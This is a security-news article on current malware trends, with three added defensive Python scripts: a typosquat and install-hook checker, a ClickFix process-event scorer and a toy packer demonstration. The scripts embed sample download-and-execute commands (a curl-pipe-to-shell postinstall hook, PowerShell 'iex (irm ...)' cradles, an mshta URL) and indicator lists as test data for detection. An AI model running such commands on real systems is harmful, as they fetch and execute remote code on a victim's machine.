6 rising malware trends every security pro should know

Malware is evolving rapidly, driven by advances in AI and changes in computing infrastructures.

Security professionals must continuously educate themselves on these trends to defend against increasingly sophisticated threats.

The traditional cat-and-mouse game between attackers and defenders has grown fiercer, with fresh techniques emerging and older, less effective approaches falling out of fashion.

Here is a look at what’s heating up in the world of malware — and what’s cooling off.

Infostealers commoditizing initial access

Infostealers have experienced huge growth of late, with a 58% increase in infection attempts year-over-year, according to cybersecurity vendor Immersive.

Strains such as Lumma Stealer, StealC, and RisePro are now responsible for 75% of all stolen credentials.

Infostealers harvest browser cookies, VPN credentials, multi-factor authentication (MFA) tokens, crypto wallet data, and more. Stolen session cookies are especially valuable because they let an attacker reuse an already authenticated session without triggering MFA. Cybercriminals sell what infostealers grab through dark web markets, giving other attackers easy access to corporate systems.

“This shift commoditizes initial access, enabling nation-state goals through simple transactions rather than complex attacks,” says Ben McCarthy, lead cyber security engineer at Immersive.

Malicious packages targeting developer environments

Threat actors are systematically compromising the software supply chain by embedding malicious code within legitimate development tools, libraries, and frameworks that organizations use to build applications.

“These supply chain attacks exploit the trust between developers and package repositories,” Immersive’s McCarthy tells CSO. “Malicious packages often mimic legitimate ones while running harmful code, evading standard code reviews.”

In 2024, researchers found 512,847 malicious packages — a 156% year-over-year increase — across software development ecosystems such as NPM, PyPI, and AI platforms like HuggingFace.
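Two of the signals McCarthy describes, a name that imitates a legitimate package and harmful code that runs outside normal code review, can be checked mechanically before a dependency is installed. The script below is an added example written for this page, not code from CSO Online or Immersive. The popular-name list, the indicator tokens and both package.json manifests are constructed; a production check would load the name list from registry download statistics, and the PyPI equivalent would inspect setup.py and pyproject hooks rather than npm lifecycle scripts.

```python
"""Triage a package manifest for two things the page describes: a name that
imitates a well-known package, and code that runs at install time.

Added example, not from the CSO article or Immersive. The popular-name list and
the package.json below are constructed; a real check would load the name list
from registry download statistics and also inspect setup.py/pyproject hooks for PyPI.
"""
import json
from typing import Optional

# Constructed stand-in for "the top N packages by downloads".
POPULAR = {"lodash", "express", "requests", "numpy", "colorama", "chalk", "axios"}

# npm runs these on `npm install` without any user action.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Tokens in a hook command that usually mean "fetch and run something".
SUSPICIOUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "powershell", "base64",
                     "eval(", "child_process", "Invoke-Expression")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; small enough for package names, no external library needed."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _norm(name: str) -> str:
    return name.lower().replace("-", "").replace("_", "").replace(".", "")


def lookalike_of(name: str, popular=POPULAR, max_distance: int = 2) -> Optional[str]:
    """The popular package `name` imitates, or None if it is one or resembles none."""
    if name.lower() in popular or len(_norm(name)) < 4:
        return None                      # the genuine package, or too short to judge
    best = None
    for p in popular:
        d = levenshtein(_norm(name), _norm(p))
        if d <= max_distance and (best is None or d < best[1]):
            best = (p, d)
    return best[0] if best else None


def suspicious_hooks(manifest: dict):
    """(hook, command) pairs whose command looks like a downloader/dropper."""
    scripts = manifest.get("scripts", {})
    return [(h, scripts[h]) for h in NPM_LIFECYCLE_HOOKS
            if h in scripts and any(t in scripts[h] for t in SUSPICIOUS_TOKENS)]


def triage(manifest_json: str) -> dict:
    """Combine both checks into one verdict for a package.json document."""
    manifest = json.loads(manifest_json)
    name = manifest.get("name", "")
    result = {"name": name, "lookalike_of": lookalike_of(name), "hooks": suspicious_hooks(manifest)}
    result["verdict"] = "review" if (result["lookalike_of"] or result["hooks"]) else "ok"
    return result


# Constructed manifests: a typosquat with a postinstall dropper, and a plain library.
SQUAT = json.dumps({"name": "lodahs", "version": "4.17.21",
                    "scripts": {"postinstall": "node -e \"require('child_process')"
                                               ".exec('curl -s https://example.invalid/i | sh')\""}})
BENIGN = json.dumps({"name": "express", "version": "4.19.2", "scripts": {"test": "mocha"}})

if __name__ == "__main__":
    for m in (SQUAT, BENIGN):
        print(triage(m))
```

The edit-distance check deliberately ignores hyphens, underscores and dots, since those are the cheapest way to make a lookalike name, and it refuses to judge names shorter than four characters, where almost everything is within two edits of something. Neither heuristic replaces reading the package; a "review" verdict means a human opens the tarball, because install hooks that download code can also be found in legitimate native-module packages.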

Ransomware becoming more targeted and sophisticated

The ransomware landscape has shifted dramatically since law enforcement cracked down on major groups like LockBit.

Modern ransomware threat actors such as RansomHub and Akira now favor smaller, highly targeted attacks, using ransomware as a final step after full infiltration and data exfiltration. This marks a move from broad, opportunistic strikes to focused, high-value campaigns.

“These targeted approaches show threat actors’ growing insight into specific vulnerabilities and their readiness to invest heavily in reconnaissance and tailored attack development,” Immersive’s McCarthy comments.

These groups use advanced evasion techniques such as living-off-the-land (LOTL) tactics and legitimate admin tools to stay hidden. They’re also shifting from file encryption to data theft and extortion, threatening public leaks to pressure victims.

“There’s been a notable uptick in the use of cloud-based services and remote management platforms as part of ransomware toolchains,” says Jamie Moles, senior technical marketing manager at network detection and response provider ExtraHop. “This aligns with a broader trend: Rather than relying solely on traditional malware payloads, adversaries are increasingly shifting toward abusing trusted platforms and ‘living-off-the-land’ techniques.”

Healthcare remains a top target of ransomware attacks, while critical infrastructure faces increasing threats as attackers exploit the urgency that prompts quick ransom payments.

Malware adopting social engineering techniques

Cybercriminals are increasingly using ClickFix, a delivery method that relies on social engineering rather than an exploit to get malware onto end-user devices.

ClickFix tricks users into executing malicious code, usually a PowerShell one-liner, on their own systems, typically by placing a command on the clipboard and instructing the user to paste it into the Windows Run dialog or a terminal.

ClickFix is a rising threat that takes advantage of growing user fatigue in having to jump through online hoops to ‘prove you’re human.’

By hijacking trust in familiar CAPTCHA processes, threat actors are getting users to actively participate in their own compromise — copying and pasting malicious commands into their systems under the guise of simple verification.

“Over the past year, we’ve seen this technique gain serious traction across phishing sites, compromised webpages, and social engineering campaigns,” says Jim Walter, senior threat researcher at SentinelLABS. “It’s simple, effective, and increasingly common.”

CISOs need to be wary of the threat because it bypasses many traditional detection methods: no vulnerability is exploited, the user launches a legitimate, signed interpreter with a malicious argument, so exploit-focused defenses see nothing unusual.

“Raising awareness, hardening endpoint execution policies, and deploying behavioral detection tools are essential to countering this wave of malware delivery,” Walter advises.
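The behavioral detection Walter recommends comes down to one question asked of process-creation telemetry: did the desktop shell just launch a script interpreter with a download-and-execute command line? The script below is an added example for this page, not code from CSO Online or SentinelLABS. The five events are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); a real EDR uses different field names, and the indicator weights and threshold are a scoring choice made here, not a vendor's.

```python
"""Score process-creation events for the ClickFix pattern: an interpreter launched
by the desktop shell with a download-and-execute command line.

Added example, not from the CSO article or SentinelLABS. The events below are
constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage,
CommandLine); a real EDR's field names and the indicator weights (a scoring
choice made here, not a vendor's) will differ.
"""
import base64
import re

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe")
# Parent of anything typed or pasted into the Win+R box or launched from the desktop.
USER_SHELL_PARENTS = ("explorer.exe",)

# (weight, pattern). Applied to the raw command line plus any decoded -EncodedCommand.
INDICATORS = [
    (3, re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod)\b", re.I)),
    (3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    (3, re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
    (2, re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    (2, re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Lure text left in the pasted line so the Run box looks like a CAPTCHA step.
    (1, re.compile(r"#.*(captcha|not a robot|verification)", re.I)),
]
THRESHOLD = 5
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: dict):
    """Return (score, matched indicator patterns) for one process-creation event."""
    if _basename(ev.get("Image", "")) not in INTERPRETERS:
        return 0, []
    cmd = ev.get("CommandLine", "")
    text = cmd + "\n" + decode_encoded_command(cmd)   # scan the decoded payload too
    score, hits = 0, []
    for weight, rx in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(rx.pattern)
    if hits and _basename(ev.get("ParentImage", "")) in USER_SHELL_PARENTS:
        score += 2          # launched from the desktop shell, i.e. by the user's own hands
        hits.append("parent:explorer.exe")
    return score, hits


def find_clickfix(events):
    """Events whose score reaches THRESHOLD, with their score and matched indicators."""
    out = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= THRESHOLD:
            out.append((ev, score, hits))
    return out


# Constructed sample events (not real telemetry).
PAYLOAD = "iex (irm https://example.invalid/verify.txt)"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SYS = "C:\\Windows\\System32\\"
PS = SYS + "WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/c.txt)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"id": 3, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoP -w hidden -enc " + ENCODED},
    {"id": 4, "ParentImage": SYS + "svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1"},
    {"id": 5, "ParentImage": "C:\\Windows\\explorer.exe", "Image": SYS + "mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
]

if __name__ == "__main__":
    for ev, score, hits in find_clickfix(SAMPLE_EVENTS):
        print(f"event {ev['id']}: score {score}, indicators {hits}")
```

Two details matter in practice. The encoded-command branch decodes the base64 as UTF-16LE, which is what PowerShell expects, so the download cradle hidden inside `-enc` scores the same as a plaintext one. And the parent-process bonus is what separates a pasted ClickFix command from a scheduled administrative script with an identical cradle; the "hardening endpoint execution policies" Walter mentions is the complementary control, for example blocking interpreters spawned by explorer.exe for users who have no business running them.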

Malware targeting macOS enterprise users

Some security vendors report a sharp increase in malware campaigns targeting macOS users in the enterprise.

Phil Stokes, macOS malware researcher at SentinelLABS/SentinelOne, tells CSO: “We’re seeing everything from infostealers disguised as business tools to highly sophisticated modular backdoors — so threat actors have clearly stepped up their game when it comes to targeting Apple users in corporate environments.”

For example, the Atomic Infostealer spreads through fake versions of well-known enterprise apps, not just the usual cracked games or consumer tools that have long been a security headache.

While ransomware and infostealers remain at the forefront of active threats, there’s been a decline in the use of older commodity malware and hacking techniques.

Polymorphic malware evading detection mechanisms

Polymorphic malware automatically modifies its code each time it replicates or infects a new system, making it difficult for signature-based detection methods to identify it.

This type of malware is challenging for antivirus software to detect and for security researchers to analyze.

Alex Hinchliffe, principal threat researcher at Unit 42, the threat intelligence and incident response arm at Palo Alto Networks, says, “Very basic or specific detection mechanisms, such as hash-based scanners, are thwarted by polymorphism but it’s worth noting that each time a malicious program is compiled — e.g., into an executable — it will yield a new unique fingerprint or hash. Add to this the plethora of free and commercially available compressor, packer, and protector tools, which can be applied to a compiled program, and the ‘same’ program will yield yet more variations and permutations of the same fingerprint.”

Polymorphic malware also often uses encryption to hide its payload, further complicating detection and analysis.
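Hinchliffe's point is easy to demonstrate: anything that changes a single byte of the file changes its hash, so a denylist of file hashes catches exactly the variants it has already seen. What survives is whatever the packer cannot change, the shape of its decoder stub and the payload underneath it. The script below is an added example written for this page, not code from CSO Online or Unit 42. Its "packer" is a constructed toy (a fixed marker, a one-byte XOR key, a run of random junk and the XOR-encoded body) standing in for the compile, pack and protect steps in the quote; real packers differ in everything but the principle.

```python
"""Why a file hash is a weak fingerprint for packed or polymorphic samples, and
what survives repacking.

Added example, not from the CSO article or Unit 42. The "packer" is a constructed
toy: a fixed marker, a one-byte XOR key, a length-prefixed run of random junk and
the XOR-encoded body. It stands in for the compile/pack/protect steps in the
quote above; real packers differ in everything but the principle.
"""
import hashlib
import os
import struct
from typing import Optional

MARKER = b"\x7fPK1"      # constructed: the part of the toy decoder stub that never changes


def pack(payload: bytes) -> bytes:
    """Each call yields a new variant: fresh key, fresh junk, same underlying payload."""
    key = os.urandom(1)[0] or 0x5A              # never XOR with 0, which would leave it in the clear
    junk = os.urandom(os.urandom(1)[0] % 32 + 1)
    body = bytes(b ^ key for b in payload)
    return MARKER + bytes([key, len(junk)]) + struct.pack(">H", len(body)) + junk + body


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_stub_signature(sample: bytes) -> bool:
    """Structural rule: the fixed marker with the key byte wildcarded (a YARA-style `??`)."""
    return sample.startswith(MARKER) and len(sample) >= len(MARKER) + 4


def unpack(sample: bytes) -> Optional[bytes]:
    """'Emulate' the stub: read key and lengths, skip the junk, undo the XOR."""
    if not matches_stub_signature(sample):
        return None
    key, junk_len = sample[4], sample[5]
    (body_len,) = struct.unpack(">H", sample[6:8])
    body = sample[8 + junk_len: 8 + junk_len + body_len]
    return bytes(b ^ key for b in body) if len(body) == body_len else None


def classify(sample: bytes, file_hash_denylist: set, payload_hash_denylist: set) -> str:
    """Three detections, most brittle first: exact file hash, hash of the unpacked body, stub shape."""
    if sha256(sample) in file_hash_denylist:
        return "hash-hit"
    inner = unpack(sample)
    if inner is not None and sha256(inner) in payload_hash_denylist:
        return "unpacked-hit"
    if matches_stub_signature(sample):
        return "stub-signature-hit"
    return "clean"


# Constructed stand-in for a malicious program body; real samples are machine code.
PAYLOAD = b"toy payload: beacon to c2.example.invalid, then exfiltrate browser cookies"


def demo(n_variants: int = 5) -> dict:
    """Repack PAYLOAD n times; denylist only the first variant's file hash."""
    variants = [pack(PAYLOAD) for _ in range(n_variants)]
    file_denylist = {sha256(variants[0])}
    payload_denylist = {sha256(PAYLOAD)}
    return {
        "distinct_file_hashes": len({sha256(v) for v in variants}),
        "verdicts": [classify(v, file_denylist, payload_denylist) for v in variants],
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows every variant with a different SHA-256, the file-hash denylist catching only the variant it was built from, and the unpack-then-hash step catching all of them. That second step is what sandboxes and emulators do at scale, and it is also why attackers keep changing packers: the stub signature is the first thing they rewrite, which pushes defenders toward behavior observed at run time rather than bytes observed on disk.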

Declining malware techniques

Some trends point the other way: certain types of malware and hacking techniques have fallen out of fashion, mainly because advances in security defenses and practices have reduced their effectiveness.

For example, threat actors rely more on legitimate admin tools (such as the Sysinternals Suite and living-off-the-land binaries, or LOLBins) for defense evasion and persistence, and less on custom malicious executables.

“On the hacking tool front, we observed a decrease in the use of more comprehensive tool suites like Cobalt Strike and Sliver,” says Lindsey Welch, technical writer at managed detection and response vendor Huntress. “However, threat actors continue to use specialized tools like Mimikatz and CrackMapExec for functionalities like password sniffing, memory dumping, privilege escalation, and lateral movement.”

Other once-popular techniques that have fallen out of favour include:

  • Network worms, such as Conficker, because modern networks now feature segmentation, automated patching, and strong endpoint defenses, all of which limit worm propagation
  • Traditional botnets
  • Exploit kits, which were once a prevalent method for delivering malware through web-based attacks: they scanned users' systems for known vulnerabilities in software such as Adobe Flash, Java, or Internet Explorer, then exploited those weaknesses to install malware
  • Office macros
  • USB-based malware

Original article: 6 rising malware trends every security pro should know, CSO Online.